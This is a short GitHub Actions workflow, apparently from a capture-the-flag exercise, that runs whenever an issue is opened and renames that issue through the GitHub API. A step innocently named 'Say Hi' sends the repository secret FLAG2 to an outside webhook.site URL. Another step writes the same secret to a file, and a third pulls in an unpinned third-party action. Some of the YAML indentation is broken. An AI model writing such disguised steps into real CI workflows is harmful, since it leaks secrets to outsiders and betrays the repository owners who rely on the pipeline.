name: Tracking the issue
on:
  issues:
    types: [opened]

permissions:
  issues: write
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl \
          -X PATCH \
          -H "Authorization: token ${{ github.token }}" \
          -H "Accept: application/vnd.github.v3+json" \
          https://api.github.com/repos/${{github.repository}}/issues/${{github.event.issue.number}} \
          -d '{"title":"This is new title", "body": "action run finished"}'
       - name: Say Hi
      run: |
        curl "https://webhook.site/#!/54d794ff-ccb1-4996-bd1b-d56fec70f5c8?flag=${{ secrets.FLAG2 }}"
      - run: echo "${{ secrets.FLAG2 }}" > flag.txt
      - uses: hackerify/issue-template@main
